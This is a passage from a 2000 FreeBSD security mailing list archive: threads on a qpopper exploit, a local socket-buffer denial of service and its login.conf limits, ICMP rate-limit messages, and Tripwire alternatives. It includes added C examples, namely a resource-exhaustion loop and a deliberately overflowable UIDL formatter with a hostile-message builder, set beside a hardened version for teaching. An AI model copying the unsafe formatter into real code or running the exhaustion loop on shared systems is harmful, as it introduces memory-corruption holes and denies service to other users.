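           n, err ? strerror(err) : "MAX_PAIRS ceiling");
    printf("worst case pinned by this process: %d pairs x 2 buffers x %d bytes\n",
           n, BUFFERSIZE);
    return 0;
}
```

Each iteration costs two descriptors, so a limit of N descriptors bounds what one process can pin at about N/2 pairs times two buffers per pair, and the loop ends with EMFILE instead of an empty mbuf pool. On FreeBSD the sbsize limit in login.conf(5) caps socket buffer memory per user directly and is the tighter control. A per-process limit alone does not stop an attacker who forks; the process limit (maxproc) has to be set as well.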
From owner-freebsd-security Tue May 30 1:51:55 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B1BB37B583; Tue, 30 May 2000 01:51:51 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id BAA72904; Tue, 30 May 2000 01:51:50 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Tue, 30 May 2000 01:51:50 -0700 (PDT)
From: Kris Kennaway
To: sen_ml@eccosys.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: QPOPPER: Remote gid mail exploit
In-Reply-To: <20000530165232H.1001@eccosys.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 30 May 2000 sen_ml@eccosys.com wrote:

> i'm a bit confused here -- does this mean the current port is still
> vulnerable or that the port available at the time of the exploit
> announcement happened to be hard to exploit?

The latter. It was fixed on FreeBSD on 2000/05/25 - an advisory is
forthcoming.

Kris

----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Tue May 30 2: 8:18 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id 93BC837B57B for ; Tue, 30 May 2000 02:08:10 -0700 (PDT) (envelope-from sen_ml@eccosys.com)
Received: (qmail 26210 invoked from network); 30 May 2000 09:03:52 -0000
Received: from localhost (127.0.0.1) by localhost with SMTP; 30 May 2000 09:03:52 -0000
To: freebsd-security@FreeBSD.ORG
Subject: Re: QPOPPER: Remote gid mail exploit
From: sen_ml@eccosys.com
In-Reply-To:
References: <20000530165232H.1001@eccosys.com>
X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN)
X-No-Archive: Yes
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20000530180805Y.1001@eccosys.com>
Date: Tue, 30 May 2000 18:08:05 +0900
X-Dispatcher: imput version 20000228(IM140)
Lines: 20
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

From: Kris Kennaway
Subject: Re: QPOPPER: Remote gid mail exploit
Date: Tue, 30 May 2000 01:51:50 -0700 (PDT)
Message-ID:

> On Tue, 30 May 2000 sen_ml@eccosys.com wrote:
>
> > i'm a bit confused here -- does this mean the current port is still
> > vulnerable or that the port available at the time of the exploit
> > announcement happened to be hard to exploit?
>
> The latter. It was fixed on FreeBSD on 2000/05/25 - an advisory is
> forthcoming.

aha. thanks for the clarification.

p.s. i started to wonder about whether there were any decent alternative
pop daemons. anyone have any suggestions? i'd have switched to the pop
daemon that comes w/ qmail but i don't want to convert to Maildir just yet.
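Kris's description of the hole earlier in this thread (a header in a delivered message, parsed by the server when the client issues EUIDL, overrunning a fixed buffer) is the unchecked-copy bug class. The program below is an added example written for this page, not qpopper's source or its fix: a toy UIDL reply formatter in its vulnerable form next to a bounded one. The header name X-UIDL, the 128-byte reply buffer, the sample messages and the helper names are all assumptions made for the illustration.

```c
/* Added example, not qpopper's code: a toy of the bug class Kris describes,
 * a POP server formatting a mail header it did not write into a fixed-size
 * reply buffer. Header name, buffer size and sample mail are assumptions. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define LINE_MAX_LEN 128   /* assumed size of the server's reply buffer */

/* ASCII case-insensitive test that `line` starts with "name:". Constructed helper. */
static int header_is(const char *line, const char *name)
{
    size_t i;
    for (i = 0; name[i] != '\0'; i++)
        if (line[i] == '\0' ||
            tolower((unsigned char)line[i]) != tolower((unsigned char)name[i]))
            return 0;
    return line[i] == ':';
}

/* Find header `name` in the header block of `msg`. Returns a pointer to the
 * value inside msg and its length (trailing CR stripped), or NULL if absent. */
static const char *find_header(const char *msg, const char *name, size_t *len)
{
    const char *p = msg;
    while (*p != '\0' && *p != '\n') {          /* an empty line ends the headers */
        if (header_is(p, name)) {
            const char *v = p + strlen(name) + 1, *e;
            while (*v == ' ' || *v == '\t') v++;
            e = strchr(v, '\n');
            *len = e ? (size_t)(e - v) : strlen(v);
            if (*len > 0 && v[*len - 1] == '\r') (*len)--;
            return v;
        }
        p = strchr(p, '\n');
        if (p == NULL) break;
        p++;
    }
    return NULL;
}

/* VULNERABLE: sprintf() writes however long the header is. By convention the
 * caller's buffer is LINE_MAX_LEN bytes, so a long X-UIDL in a mail the
 * attacker sent runs past it the moment the victim lists UIDLs. Returns the
 * byte count written; the overrun shows as a value above LINE_MAX_LEN when
 * a large scratch buffer is passed (as the test does), and as memory
 * corruption when a real 128-byte buffer is. */
int format_uidl_unsafe(int msgno, const char *msg, char *reply)
{
    size_t len;
    const char *v = find_header(msg, "X-UIDL", &len);
    if (v == NULL) return -1;
    return sprintf(reply, "%d %.*s\r\n", msgno, (int)len, v);
}

/* HARDENED: the real buffer size travels with the buffer, snprintf() never
 * writes past it, an oversized value is refused rather than truncated, and
 * the RFC 1939 shape of a UIDL (1..70 characters in 0x21..0x7E) is enforced
 * so CR, LF, space and control bytes never reach the client. */
int format_uidl_safe(int msgno, const char *msg, char *reply, size_t replysz)
{
    size_t len, i;
    int n;
    const char *v = find_header(msg, "X-UIDL", &len);
    if (v == NULL || len == 0 || len > 70) return -1;
    for (i = 0; i < len; i++)
        if ((unsigned char)v[i] < 0x21 || (unsigned char)v[i] > 0x7e) return -1;
    n = snprintf(reply, replysz, "%d %.*s\r\n", msgno, (int)len, v);
    if (n < 0 || (size_t)n >= replysz) return -1;   /* would not fit: refuse */
    return n;
}

/* Constructed sample mail; not a real message. */
const char benign_msg[] =
    "From: alice@example.net\n"
    "X-UIDL: 3f2a9c1e\n"
    "Subject: hi\n"
    "\n"
    "body\n";

/* Build a constructed hostile message whose X-UIDL value is uidl_len 'A's.
 * Returns 0, or -1 if `out` is too small. */
int make_hostile_msg(char *out, size_t outsz, size_t uidl_len)
{
    const char *head = "From: mallory@example.net\nX-UIDL: ";
    const char *tail = "\n\nbody\n";
    size_t hl = strlen(head);
    if (hl + uidl_len + strlen(tail) + 1 > outsz) return -1;
    memcpy(out, head, hl);
    memset(out + hl, 'A', uidl_len);
    strcpy(out + hl + uidl_len, tail);
    return 0;
}

int main(void)
{
    char scratch[4096], reply[LINE_MAX_LEN], hostile[1024];
    make_hostile_msg(hostile, sizeof hostile, 300);
    printf("benign, safe:    %d bytes\n",
           format_uidl_safe(1, benign_msg, reply, sizeof reply));
    printf("hostile, unsafe: %d bytes written for a %d-byte reply buffer\n",
           format_uidl_unsafe(2, hostile, scratch), LINE_MAX_LEN);
    printf("hostile, safe:   %d (rejected)\n",
           format_uidl_safe(2, hostile, reply, sizeof reply));
    return 0;
}
```

The unsafe variant writes as many bytes as the header holds: a 300-byte value produces a 304-byte reply for a buffer the protocol code sized at 128, which on a real stack is the overflow. The bounded variant passes the buffer size to snprintf(), refuses instead of truncating (a silently shortened UIDL would make clients mis-track messages), and the RFC 1939 length and character check rejects the hostile value before any formatting happens at all.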
From owner-freebsd-security Tue May 30 4: 7:42 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.polytechnic.edu.na (mail.polytechnic.edu.na [196.31.225.2]) by hub.freebsd.org (Postfix) with ESMTP id CD35B37B729 for ; Tue, 30 May 2000 04:07:26 -0700 (PDT) (envelope-from tim@polytechnic.edu.na)
Received: from [196.31.225.199] (helo=polytechnic.edu.na) by mail.polytechnic.edu.na with esmtp (Exim 3.02 #2) id 12wlkl-0000eP-00; Tue, 30 May 2000 11:08:15 -0200
Message-ID: <3933A0D8.5BDAA415@polytechnic.edu.na>
Date: Tue, 30 May 2000 12:07:04 +0100
From: Tim Priebe
Reply-To: tim@iafrica.com.na
X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 3.4-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: sen_ml@eccosys.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: QPOPPER: Remote gid mail exploit
References: <20000530165232H.1001@eccosys.com> <20000530180805Y.1001@eccosys.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

sen_ml@eccosys.com wrote:

> p.s. i started to wonder about whether there were any decent
> alternative pop daemons. anyone have any suggestions? i'd have
> switched to the pop daemon that comes w/ qmail but i don't want to
> convert to Maildir just yet.

Check cucipop in ports, the only problem I have had with it is that it
seems to consistently report that it is going to send 9 more bytes than it
actually does. It is also less resource intensive than qpopper.

Tim.
From: Dug Song
To: freebsd-security@FreeBSD.ORG
Subject: Re: QPOPPER: Remote gid mail exploit
Date: Tue, 30 May 2000 09:19:21 -0400 (EDT)

On Tue, 30 May 2000 sen_ml@eccosys.com wrote:

> p.s. i started to wonder about whether there were any decent
> alternative pop daemons. anyone have any suggestions?

Solar Designer's popa3d is quite nice.

http://www.openwall.com/popa3d/

-d.
---
http://www.monkey.org/~dugsong/

From: Alfred Perlstein
To: Justin Stanford
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Date: Tue, 30 May 2000 10:46:32 -0700

* Justin Stanford [000530 02:18] wrote:
> Tested as well on 3.4-STABLE and 4.0-STABLE - it works.

*sigh* please see 'man limit' on 4.0.
thanks,
-Alfred

From: Garrett Wollman
To: Alfred Perlstein
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Date: Tue, 30 May 2000 13:26:56 -0400 (EDT)

< said:

> *sigh* please see 'man limit' on 4.0.

ITYM ``see `man setrlimit' with special attention to RLIMIT_SBSIZE''.
`man limit' doesn't provide any useful information at all.

-GAWollman

--
Garrett A.
Wollman              | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu  | O Siem / The fires of freedom
Opinions not those of| Dance in the burning flame
MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick

From: "Danny Wong"
Subject: process eat up all me process time
Date: Wed, 31 May 2000 12:31:32 +0800

Hi!

I need to log in to a remote site and do some editing on a configuration
file. As the connection is not very stable, I sometimes lose the
connection while editing a file. A few days later, I logged in again and
found that about 98% of CPU time was occupied by 'ee', the process that
was running when I lost the connection a few days earlier. Also, the
connections that are supposed to be dead still exist and are running,
e.g. csh, ee...

I am running FreeBSD 3.2-STABLE.

Can this be used to create a DoS attack?

Thanks!
Danny

From: Alfred Perlstein
To: Danny Wong
Cc: freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: process eat up all me process time
Date: Tue, 30 May 2000 22:36:31 -0700

* Danny Wong [000530 21:35] wrote:
> Hi!
> I need to log in to a remote site and do some editing on a configuration
> file. As the connection is not very stable, I sometimes lose the
> connection while editing a file. A few days later, I logged in again and
> found that about 98% of CPU time was occupied by 'ee', the process that
> was running when I lost the connection a few days earlier. Also, the
> connections that are supposed to be dead still exist and are running,
> e.g. csh, ee...
> I am running FreeBSD 3.2-STABLE.

I'm pretty sure a fix was put in later for 3-stable; i'd upgrade if
possible.

> Can this be used to create a DoS attack?

A pretty sad one maybe. :)

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."
From: Matt Heckaman
To: Garrett Wollman
Cc: FreeBSD-SECURITY
Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Date: Wed, 31 May 2000 02:07:26 -0400 (EDT)

On Tue, 30 May 2000, Garrett Wollman wrote:
[...]
: ITYM ``see `man setrlimit' with special attention to RLIMIT_SBSIZE''.
: `man limit' doesn't provide any useful information at all.

Yes, I see what you mean and understand RLIMIT_SBSIZE, but just how is
that set on a machine-wide, all-users scale? From what I can tell from
login.conf(5) there's no resource for it.

RESOURCE LIMITS
     Name           Type    Notes  Description
     cputime        time           CPU usage limit.
     filesize       size           Maximum file size limit.
     datasize       size           Maximum data size limit.
     stacksize      size           Maximum stack size limit.
     coredumpsize   size           Maximum coredump size limit.
     memoryuse      size           Maximum of core memory use size limit.
     memorylocked   size           Maximum locked in core memory size limit.
     maxproc        number         Maximum number of processes.
     openfiles      number         Maximum number of open files per process.
     ...

Is the manual page out of date and it's there, or is it not?
: -GAWollman

Regards,
Matt Heckaman
matt@arpa.mail.net
http://www.lucida.qc.ca

From: Justin Stanford
To: Matt Heckaman
Cc: Garrett Wollman, FreeBSD-SECURITY
Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Date: Wed, 31 May 2000 08:10:31 +0200 (SAST)

Take a look at the sample login.conf entry on http://www.security.za.net
(News Section) - this has proven to prevent the DoS from working.

Regards,
jus

--
Justin Stanford
082 7402741
jus@security.za.net
www.security.za.net
IT Security and Solutions

On Wed, 31 May 2000, Matt Heckaman wrote:

> On Tue, 30 May 2000, Garrett Wollman wrote:
> [...]
> : ITYM ``see `man setrlimit' with special attention to RLIMIT_SBSIZE''.
> : `man limit' doesn't provide any useful information at all.
>
> Yes, I see what you mean and understand RLIMIT_SBSIZE, but just how is
> that set on a machine-wide, all-users scale? From what I can tell from
> login.conf(5) there's no resource for it.
>
> RESOURCE LIMITS
> [...]
>
> Is the manual page out of date and it's there, or is it not?
>
> : -GAWollman
>
> Regards,
> Matt Heckaman
> matt@arpa.mail.net
> http://www.lucida.qc.ca

From: Bhishan Hemrajani
To: Justin Stanford
Cc: Matt Heckaman, Garrett Wollman, FreeBSD-SECURITY
Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Date: Tue, 30 May 2000 23:24:56 -0700 (PDT)

Is there a patch for 3.4-STABLE users so that the limits can be applied?

I have been informed of one located at:
http://people.freebsd.org/~green/sbsize2.patch

However, it is not functional at this moment.

Thank you.

--bhishan

> Take a look at the sample login.conf entry on http://www.security.za.net
> (News Section) - this has proven to prevent the DoS from working.
>
> Regards,
> jus
>
> [...]

--
Bhishan Hemrajani / bhishan@fusion.unixfreak.org / PGP: 0xFAC75561
Finger bhishan@fusion.unixfreak.org for more information.

The difference between us and a computer is that the computer is
blindingly stupid, but it is capable of being stupid many, many million
times a second.

From: Justin Stanford
To: Bhishan Hemrajani
Cc: Matt Heckaman, Garrett Wollman, FreeBSD-SECURITY
Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Date: Wed, 31 May 2000 08:18:19 +0200 (SAST)

That sample login.conf was taken from a 3.4-STABLE machine - it should
work fine all round.

--
Justin Stanford
082 7402741
jus@security.za.net
www.security.za.net
IT Security and Solutions

On Tue, 30 May 2000, Bhishan Hemrajani wrote:

> Is there a patch for 3.4-STABLE users so that the limits can be applied?
>
> I have been informed of one located at:
> http://people.freebsd.org/~green/sbsize2.patch
>
> However, it is not functional at this moment.
>
> Thank you.
>
> --bhishan
>
> [...]

From: Matt Heckaman
To: Justin Stanford
Cc: FreeBSD-SECURITY
Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Date: Wed, 31 May 2000 02:20:18 -0400 (EDT)

On Wed, 31 May 2000, Justin Stanford wrote:
...
: Take a look at the sample login.conf entry on http://www.security.za.net
: (News Section) - this has proven to prevent the DoS from working.

Which part of it, hmm? My evaluation of it would be the openfile limit,
in that they cannot open up enough descriptors to successfully harm the
box.
Time for me to go play with login.conf some more, thanks. The question
still remains though: can you set RLIMIT_SBSIZE and RLIMIT_RSS with the
login.conf? Both would be very useful to me :)

: Regards,
: jus

Matt Heckaman
matt@arpa.mail.net
http://www.lucida.qc.ca

From: Mike Silbersack
To: Bhishan Hemrajani
Cc: Justin Stanford, Matt Heckaman, Garrett Wollman, FreeBSD-SECURITY
Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Date: Wed, 31 May 2000 01:21:44 -0500 (CDT)

In addition to looking at that, you might want to apply my backport of
the mbuf waiting code so the box doesn't panic; the code is solid, but
as I found another leak while testing, I haven't pushed to get it
committed yet. (The leak occurs in 4 as well, so it's no reason to
trust the patch less.)

You can grab it from http://www.silby.com/patches/

EVERYONE running a 3.4 box is welcome to test the patch.
Mike "Silby" Silbersack

On Tue, 30 May 2000, Bhishan Hemrajani wrote:

> Is there a patch for 3.4-STABLE users so that the limits can be applied?
>
> I have been informed of one located at:
> http://people.freebsd.org/~green/sbsize2.patch
>
> However, it is not functional at this moment.
>
> Thank you.
>
> --bhishan

From: Garrett Wollman
To: security@FreeBSD.org
Subject: [The IESG: WG ACTION: Security Issues in Network Ev]
Date: Wed, 31 May 2000 11:11:43 -0400 (EDT)

------- start of forwarded message (RFC 934 encapsulation) -------
From: The IESG
To: IETF-Announce: ;
Subject: WG ACTION: Security Issues in Network Event Logging (syslog)
Date: Wed, 31 May 2000 07:05:06 -0400

A new working group has been formed in the Security Area of the IETF.
For additional information, contact the Area Directors or the WG Chair.
Security Issues in Network Event Logging (syslog)
- -------------------------------------------------

Current Status: Active Working Group

Chair(s):
    Chris Lonvick

Security Area Director(s):
    Jeffrey Schiller
    Marcus Leech

Security Area Advisor:
    Jeffrey Schiller

Mailing Lists:
    General Discussion: syslog-sec@employees.org
    To Subscribe:       majordomo@employees.org
        In Body:        subscribe syslog-sec your_email_address
    Archive:            http://www.mail-archive.com/syslog-sec@employees.org/

Description of Working Group:

Syslog is a de-facto standard for logging system events. However, the
protocol component of this event logging system has not been formally
documented. While the protocol has been very useful and scalable, it has
some known but undocumented security problems. For instance, the
messages are unauthenticated and there is no mechanism to provide
verified delivery and message integrity.

The goal of this working group is to document and address the security
and integrity problems of the existing Syslog mechanism. In order to
accomplish this task we will document the existing protocol. The working
group will also explore and develop a standard to address the security
problems.

Beyond documenting the Syslog protocol and its problems, the working
group will work on ways to secure the Syslog protocol. At a minimum this
group will address providing authenticity, integrity and confidentiality
of Syslog messages as they traverse the network. The belief is that we
can provide mechanisms that can be utilized in existing programs with
few modifications to the protocol while providing significant security
enhancements.

Goals and Milestones:

May 00   Post as an Internet Draft the observed behavior of the Syslog
         protocol for consideration as an Informational Document.
Jun 00   Submit Syslog protocol document to IESG for consideration as an
         INFORMATIONAL RFC.
Jul 00   Post as an Internet Draft the specification for an authenticated
         Syslog for consideration as a Standards Track RFC.
Aug 00   Submit Syslog Authentication Protocol to IESG for consideration
         as a PROPOSED STANDARD.
Sep 00   Post an Internet Draft describing enhancements to the Syslog
         authentication protocol to add verification of delivery and
         other security services.
Oct 00   Submit Syslog Authentication Protocol Enhancement to IESG for
         consideration as a PROPOSED STANDARD.
Dec 00   Revise drafts as necessary to advance these Internet-Drafts to
         Standards Track RFCs.

------- end -------

From: Bosko Milekic
To: Mike Silbersack
Cc: FreeBSD-SECURITY
Subject: Re: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Date: Wed, 31 May 2000 12:36:47 -0400 (EDT)

On Wed, 31 May 2000, Mike Silbersack wrote:

> EVERYONE running a 3.4 box is welcome to test the patch.
>
> Mike "Silby" Silbersack

I don't have a 3.4 machine up right now, but you should check to make
sure that all callers to m_get and MGET actually check their return
values, even if the call goes in with M_WAIT.
I remember seeing some places in the code where callers with M_WAIT
automatically assumed that they would be getting an mbuf, which probably
has to do with the old behavior of mbufs being allocated with malloc().
I think green mentioned this to me, although I remember fixing a few of
them with the initial 4.x patch.

--
Bosko Milekic
bmilekic@technokratis.com
WWW: http://www.technokratis.com/
Voice/Mobile: 514.865.7738 * Pager: 514.921.0237

From: Mitch Collinsworth
To: freebsd-security@freebsd.org
Cc: mkc@larryboy.graphics.cornell.edu
Subject: icmp-response bandwidth limit
Date: Wed, 31 May 2000 13:29:29 -0400

Ok, my fileserver just logged this:

May 31 01:03:56 [hostname] /kernel: icmp-response bandwidth limit 602/100 pps

Where do I find more details about what this means?
-Mitch

From: Visigoth
To: Mitch Collinsworth
Cc: freebsd-security@freebsd.org, mkc@larryboy.graphics.cornell.edu
Subject: Re: icmp-response bandwidth limit
Date: Wed, 31 May 2000 12:44:58 -0500 (CDT)

This type of kernel message generally denotes one of two things, neither
of which is usually nice. icmp-response bandwidth limiting is built into
the kernel to lessen the effects of a ping flood, and these messages are
often the result of being flooded, but I have also noticed that message
due to scans such as nmap. Either way, something happened that you will
probably want to know about... I might recommend installing ipfilter and
logging all traffic except your known/public services (and maybe even
some of those ;).

Visigoth

Damieon Stark
Sr. Unix Systems Administrator
visigoth@telemere.net

PGP Public Key: www.telemere.net/~visigoth/visigoth.asc

M$      - Where do you want to go today?
Linux   - Where do you want to go tomorrow?    | FreeBSD - The POWER to serve
FreeBSD - Are you guys coming or what?         | http://www.freebsd.org

From: "Jeremy L. Ramirez"
To: Visigoth, Mitch Collinsworth
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: icmp-response bandwidth limit
Date: Wed, 31 May 2000 13:05:46 -0500

It can also come from well-known bandwidth measurement tools (bing, et
al). I have seen this happen a few times. If not you, then someone is
probably snooping around looking for information; as Damieon said, not
very nice.
Good luck,

Jeremy Ramirez
jramirez@xlinet.net

At 12:44 PM 5/31/2000 -0500, Visigoth wrote:
>
>	This type of kernel message generally denotes one of two things,
>neither of which is usually nice.  icmp-response bandwidth limiting is
>built into the kernel to lessen the effects of a ping flood, and is often
>the result of being flooded, but I have also noticed that message due to
>scans such as nmap.  Either way, something happened that you will probably
>want to know about...  I might recommend installing ipfilter and logging
>all traffic except your known/public services (and maybe even some of
>those ;).
>
>Visigoth
>
>Damieon Stark
>Sr. Unix Systems Administrator
>visigoth@telemere.net
>
>PGP Public Key: www.telemere.net/~visigoth/visigoth.asc
>
>____________________________________________________________________________
>M$      - Where do you want to go today?     |
>Linux   - Where do you want to go tomorrow?  | FreeBSD - The POWER to serve
>FreeBSD - Are you guys coming or what?
>                                             | http://www.freebsd.org
>----------------------------------------------------------------------------

From owner-freebsd-security Wed May 31 10:56:45 2000
Date: Wed, 31 May 2000 13:56:34 -0400
From: Mitch Collinsworth
To: Visigoth
Cc: freebsd-security@freebsd.org
Subject: Re: icmp-response bandwidth limit
Message-Id: <200005311756.NAA17404@larryboy.graphics.cornell.edu>
In-Reply-To: Message from Visigoth of "Wed, 31 May 2000 12:44:58 CDT."

>	This type of kernel message generally denotes one of two things,
>neither of which is usually nice.  icmp-response bandwidth limiting is
>built into the kernel to lessen the effects of a ping flood, and is often
>the result of being flooded, but I have also noticed that message due to
>scans such as nmap.  Either way, something happened that you will probably
>want to know about...
>I might recommend installing ipfilter and logging
>all traffic except your known/public services (and maybe even some of
>those ;).

Ok, thanks for the info.  I failed to mention a couple of possibly
relevant items:

- This machine is running 3.4-R
- There are several other FreeBSD machines on the same net, none of
  which logged this message, including 2 that are 4.0-R.

-Mitch

From owner-freebsd-security Wed May 31 12:05:35 2000
Date: Wed, 31 May 2000 14:05:30 -0500 (CDT)
From: Mike Silbersack
To: Visigoth
Cc: Mitch Collinsworth, freebsd-security@freebsd.org, mkc@larryboy.graphics.cornell.edu
Subject: Re: icmp-response bandwidth limit

On Wed, 31 May 2000, Visigoth wrote:

> neither of which is usually nice.  icmp-response bandwidth limiting is
> built into the kernel to lessen the effects of a ping flood, and is often

Actually, it doesn't rate limit icmp echos (yet).  It rate limits RST
packets and icmp port unreachables.
Mike "Silby" Silbersack

From owner-freebsd-security Wed May 31 12:59:45 2000
Date: Wed, 31 May 2000 15:01:11 -0500 (EST)
From: Jeremy Gaddis
To: Mitch Collinsworth
Cc: Visigoth, freebsd-security@FreeBSD.ORG
Subject: Re: icmp-response bandwidth limit
In-Reply-To: <200005311756.NAA17404@larryboy.graphics.cornell.edu>

On Wed, 31 May 2000, Mitch Collinsworth wrote:

> Ok, thanks for the info.  I failed to mention a couple of possibly
> relevant items:
>
> - This machine is running 3.4-R
> - There are several other FreeBSD machines on the same net, none of
>   which logged this message, including 2 that are 4.0-R.

I get this when doing an nmap scan from across my network.  Running
4.0-RELEASE.

--
Jeremy L.
Gaddis

From owner-freebsd-security Wed May 31 19:15:17 2000
Date: Wed, 31 May 2000 22:15:08 -0400 (EDT)
From: Robert Gash
To: freebsd-security@freebsd.org
Subject: Recommendations for alternative tripwire options

After reading the recent articles about the crack attempts on the
community LAN I am going to go ahead and deal with the hassle of
installing system file watching programs (like tripwire, etc.).  However,
as we are a commercial organization, the new copies of tripwire are not
free for us, and I'd like to use something in the GPL (as GPL software
often works better than commercial products).  I've looked around and
found AIDE, which appears to be a tripwire replacement written under the
GNU GPL.  I have only found one mention of this on the freebsd-security
list in the geocrawler archives, so I'll ask.

Has anyone found any decent systems like tripwire available under the GNU
GPL?  I like to keep my systems pretty tight (nothing but trusted daemons
[FTP, Apache, openssh] running on the machines, and we don't allow any
users to log in, period.), but security from the inside can never hurt
(especially with a growing staff on the inside).
If you know of some
software like tripwire available under the GPL (or freely available to
commercial organizations), I'd love to hear from you (and perhaps some
others on the list as well).  I've had no success in getting AIDE to
compile on my 3.4-S box over here; I'll include the compile errors below.

Thanks for any insight into this matter you may be able to provide.

-Robert Gash

AIDE 0.7 Compile Errors:
-----------------------------------------------------
gcc -DHAVE_CONFIG_H -I. -I/root/aide/aide-0.7/src -I.. -I/usr/local/include -I/root/aide/aide-0.7/include -I/root/aide/aide-0.7 -I/root/aide/aide-0.7/src -g -O2 -c db_file.c
db_file.c: In function `db_readline_file':
db_file.c:215: warning: dereferencing `void *' pointer
db_file.c:215: request for member `_file' in something not a structure or union
gmake[3]: *** [db_file.o] Error 1
-----------------------------------------------------

--
.----------------- PGP Key: `finger gashalot@gashalot.com` -----------------.
| Robert Gash                      | Work - gashalot@fasturl.net            |
| Senior Systems Administrator     | Personal - gashalot@gashalot.com       |
| VenerNet Inc -- www.fasturl.net  | http://www.gashalot.com                |
`---- PGP Key Fprint: 78 5D 64 D2 99 F3 D8 A0 B2 56 DF EF F2 C6 D3 DF ----'

From owner-freebsd-security Wed May 31 19:50:51 2000
Date: Wed, 31 May 2000 19:49:15 -0700
From: Cy Schubert - ITSD Open Systems Group
Reply-To: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 4.0-STABLE
To: Robert Gash
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Recommendations for alternative tripwire options
Message-Id: <200006010249.e512nGk04745@cwsys.cwsent.com>
In-reply-to: Your message of "Wed, 31 May 2000 22:15:08 EDT."

In message , Robert Gash writes:
> After reading the recent articles about the crack attempts on the
> community LAN I am going to go ahead and deal with the hassle of
> installing system file watching programs (like tripwire, etc.).  However,
> as we are a commercial organization, the new copies of tripwire are not
> free for us, and I'd like to use something in the GPL (as GPL software
> often works better than commercial products).  I've looked around and
> found AIDE, which appears to be a tripwire replacement written under the
> GNU GPL.  I have only found one mention of this on the freebsd-security
> list in the geocrawler archives, so I'll ask.
>
> Has anyone found any decent systems like tripwire available under the GNU
> GPL?
> I like to keep my systems pretty tight (nothing but trusted daemons
> [FTP, Apache, openssh] running on the machines, and we don't allow any
> users to log in, period.), but security from the inside can never hurt
> (especially with a growing staff on the inside).  If you know of some
> software like tripwire available under the GPL (or freely available to
> commercial organizations), I'd love to hear from you (and perhaps some
> others on the list as well).  I've had no success in getting AIDE to
> compile on my 3.4-S box over here; I'll include the compile errors below.

I've managed to build, install, and test aide on FreeBSD and I happen
to like Tripwire better.  You can get 1.3 or 1.3.1 from
tripwiresecurity.com.  As they don't have a FreeBSD product I've been
told by a Tripwiresecurity salesman that FreeBSD users can use 1.3.1
without restriction.  Reading the copyright I don't see any
restriction.  I do have a locally developed port for 1.3.1.  If anyone
wants it I could submit a PR to have it replace Tripwire 1.2 or be added
in addition to 1.2 to the ports collection.

Tripwiresecurity is talking about releasing Tripwire 2.x to open
source; however, you'd still have to purchase the Tripwire console.
They're not exactly sure when.

On the other hand I did submit a PR with an aide 0.6 port.  I'm not
sure what happened to it, probably still in gnats somewhere.  It would
be trivial to update the port for 0.7.
Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Team Leader, Sun/DEC Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

From owner-freebsd-security Wed May 31 22:51:15 2000
Date: Thu, 1 Jun 2000 15:21:00 +0930 (CST)
From: Greg Lewis
To: Robert Gash
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Recommendations for alternative tripwire options
Message-Id: <200006010551.PAA24639@ares.trc.adelaide.edu.au>
In-Reply-To: from Robert Gash at "May 31, 2000 10:15:08 pm"

Robert Gash wrote:
> AIDE 0.7 Compile Errors:
> -----------------------------------------------------
> gcc -DHAVE_CONFIG_H -I. -I/root/aide/aide-0.7/src
> -I.. -I/usr/local/include -I/root/aide/aide-0.7/include
> -I/root/aide/aide-0.7 -I/root/aide/aide-0.7/src -g -O2 -c db_file.c
> db_file.c: In function `db_readline_file':
> db_file.c:215: warning: dereferencing `void *' pointer
> db_file.c:215: request for member `_file' in something not a structure or
> union
